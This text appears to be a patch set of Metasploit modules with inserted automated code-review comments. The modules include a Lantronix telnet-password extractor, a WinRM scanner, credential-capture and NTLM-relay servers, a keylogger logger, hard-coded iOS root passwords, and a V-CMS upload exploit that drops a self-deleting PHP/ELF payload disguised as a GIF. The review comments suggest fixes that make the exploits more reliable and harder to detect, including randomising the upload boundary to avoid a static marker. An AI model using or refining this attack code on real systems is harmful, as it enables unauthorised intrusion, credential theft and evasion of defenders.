||||
devices via the config port (30718/udp, enabled by default) and extracts the
|
||||
telnet password. It has been tested successfully on a Lantronix Device Server
|
||||
with software version V5.8.0.1.
|
||||
},
|
||||
'Author' => 'jgor',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::CHOST,
|
||||
Opt::RPORT(30718)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
setup_probe = "\x00\x00\x00\xF8"
|
||||
password = nil
|
||||
|
||||
begin
|
||||
# Create an unbound UDP socket if no CHOST is specified, otherwise
|
||||
# create a UDP socket bound to CHOST (in order to avail of pivoting)
|
||||
udp_sock = Rex::Socket::Udp.create( {
|
||||
'LocalHost' => datastore['CHOST'] || nil,
|
||||
'PeerHost' => ip,
|
||||
'PeerPort' => datastore['RPORT'],
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
}
|
||||
})
|
||||
|
||||
udp_sock.put(setup_probe)
|
||||
|
||||
res = udp_sock.recvfrom(65535, 0.5) and res[1]
|
||||
|
||||
if res
|
||||
password = parse_reply(res)
|
||||
end
|
||||
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
|
||||
print_error("Connection error")
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error("Unknown error: #{e.class} #{e}")
|
||||
ensure
|
||||
udp_sock.close if udp_sock
|
||||
end
|
||||
|
||||
if password
|
||||
print_good("#{rhost} - Telnet password found: #{password.to_s}")
|
||||
report_auth_info({
|
||||
:host => rhost,
|
||||
:port => 9999,
|
||||
:sname => 'telnet',
|
||||
:duplicate_ok => false,
|
||||
:pass => password,
|
||||
})
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def parse_reply(pkt)
|
||||
setup_record = pkt[0]
|
||||
|
||||
# If response is a setup record, extract password bytes 13-16
|
||||
if setup_record[3].ord == 0xF9
|
||||
return setup_record[12,4]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
end
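Review bot: `res = udp_sock.recvfrom(65535, 0.5) and res[1]` does not do what it reads as: `and` binds looser than `=`, so `res` receives the raw `recvfrom` result and the `res[1]` sender check is evaluated and discarded, meaning the following `if res` is true for any non-nil return (including an empty record, if `recvfrom` returns one on timeout rather than nil). `parse_reply` then calls `setup_record[3].ord` and slices `setup_record[12,4]` with no length check, so a short or empty datagram raises on `nil.ord` and surfaces only as "Unknown error" from the `rescue ::Exception` clause. I would write `res = udp_sock.recvfrom(65535, 0.5)` / `password = parse_reply(res) if res && res[1]` and guard the parser with `return nil unless setup_record && setup_record.length >= 16 && setup_record[3].ord == 0xF9`. The four password bytes are also printed raw in `print_good`, so a non-printable byte garbles the console line; `password.inspect` or a hex dump alongside the string would be safer.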
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['BID', '51182'],
|
||||
['CVE', '2011-4862'],
|
||||
['EDB', 18280],
|
||||
['EDB', '18280'],
|
||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
|
||||
]
|
||||
)
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['OSVDB', '77455'],
|
||||
['BID', '50890'],
|
||||
['EDB', 18189],
|
||||
['EDB', '18189'],
|
||||
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
|
||||
],
|
||||
'DisclosureDate' => "Dec 12 2011"
|
||||
|
|
|
@ -0,0 +1,64 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/proto/ntlm/message'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::WinRM
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'WinRM Authentication Method Detection',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
|
||||
If it is a WinRM service, it also gathers the Authentication Methods supported.
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
deregister_options('USERNAME', 'PASSWORD')
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
resp = winrm_poke
|
||||
return nil if resp.nil?
|
||||
if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
|
||||
methods = parse_auth_methods(resp)
|
||||
desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
|
||||
report_service(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:name => 'winrm',
|
||||
:info => desc
|
||||
)
|
||||
print_good "Negotiate protocol supported" if methods.include? "Negotiate"
|
||||
print_good "Kerberos protocol supported" if methods.include? "Kerberos"
|
||||
print_good "Basic protocol supported" if methods.include? "Basic"
|
||||
else
|
||||
print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
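Review bot: `resp.headers['Server'].include? "Microsoft-HTTPAPI"` in `run_host` raises `NoMethodError` when a 401 response carries no `Server` header, since the `resp.code == 401` test on the same line does not guarantee the header exists; use `resp.headers['Server'].to_s.include?("Microsoft-HTTPAPI")` and the same `.to_s` when building `desc`. The three `print_good` lines also omit the `#{ip}:#{rport}` prefix that the `print_error` branch uses, which makes results hard to attribute when scanning a range. Basic being offered is itself a finding worth calling out, because over plain HTTP it sends credentials merely base64-encoded: `print_good "#{ip}:#{rport} Basic protocol supported (credentials sent in the clear unless the transport is HTTPS)" if methods.include? "Basic"`. Whether `winrm_poke` can raise on connection errors rather than returning nil is not visible here and would be worth confirming.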
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
|
||||
'Version' => '$Revision: 14774 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module provides a fake DRDA (DB2, Informix, Derby) server
|
||||
that is designed to capture authentication credentials.
|
||||
|
|
|
@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("[#{cid}] Keys: #{nice}")
|
||||
|
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request '#{request.uri}'...")
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Client MS Credential Relayer',
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module relays negotiated NTLM Credentials from an HTTP server to multiple
|
||||
protocols. Currently, this module supports relaying to SMB and HTTP.
|
||||
|
@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
'Rich Lundeen <richard.lundeen[at]gmail.com>',
|
||||
],
|
||||
'Version' => '$Revision:$',
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
|
@ -93,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Handles the initial requests waiting for the browser to try NTLM auth
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_args()
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => 'This module emulates a webserver leaking PII data',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'MJC',
|
||||
'Version' => '$Revision: $',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.metasploit.com'],
|
||||
|
|
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'CPUID-based Context Keyed Payload Encoder',
|
||||
'Version' => '$Revision: 1$',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
|
||||
},
|
||||
|
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
|
||||
['OSVDB', '61284']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => "Jul 2 2007",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Platform' => 'bsd',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4862'],
|
||||
['OSVDB', '78020'],
|
||||
['BID', '51182'],
|
||||
['EDB', 18280]
|
||||
['EDB', '18280']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'bsd',
|
||||
|
|
|
@ -6,11 +6,13 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/php_exe'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::PhpEXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -28,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'AutoSec Tools', #Initial discovery
|
||||
'sinn3r' #Metasploit
|
||||
'AutoSec Tools', # Initial discovery
|
||||
'sinn3r' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -42,15 +44,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => "none"
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['V-CMS 1.0', {}],
|
||||
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
|
||||
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
|
||||
|
@ -75,15 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm(@payload_name)
|
||||
else
|
||||
client.shell_command_token("rm #{@payload_name}")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
@ -91,18 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
@payload_name = "#{rand_text_alpha(5)}.php"
|
||||
p = %Q|<?php
|
||||
#{payload.encoded}
|
||||
?>
|
||||
|
|
||||
|
||||
p = p.gsub(/^\t\t/, '')
|
||||
p = get_write_exec_payload(:unlink_self=>true)
|
||||
|
||||
post_data = "------x\r\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
|
||||
post_data << "Content-Type: image/gif\r\n"
|
||||
post_data << "\r\n"
|
||||
post_data << p
|
||||
post_data << p + "\r\n"
|
||||
post_data << "------x--\r\n"
|
||||
|
||||
print_status("#{peer} Uploading payload: #{@payload_name}")
|
||||
|
@ -133,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
handler
|
||||
end
|
||||
end
|
||||
end
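Review bot: `post_data` is still assembled with the fixed multipart boundary `------x`, while `p` now comes from `get_write_exec_payload(:unlink_self=>true)`, which for the new Linux x86 target presumably embeds a binary ELF in the PHP dropper rather than the ASCII PHP the old inline template held; if that blob contains the boundary sequence the server's multipart parser truncates the upload and the request carries a static marker besides. Generating it once, `boundary = rand_text_alphanumeric(16)`, and interpolating it into the three `post_data` lines avoids both. Removing `on_new_session` also means cleanup now depends entirely on the payload actually executing, so an upload that succeeds but never triggers leaves `@payload_name` on the target; a comment next to `get_write_exec_payload` noting that `:unlink_self` is the only cleanup would help the next maintainer. `exploit` continues outside the hunk.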
|
||||
|
|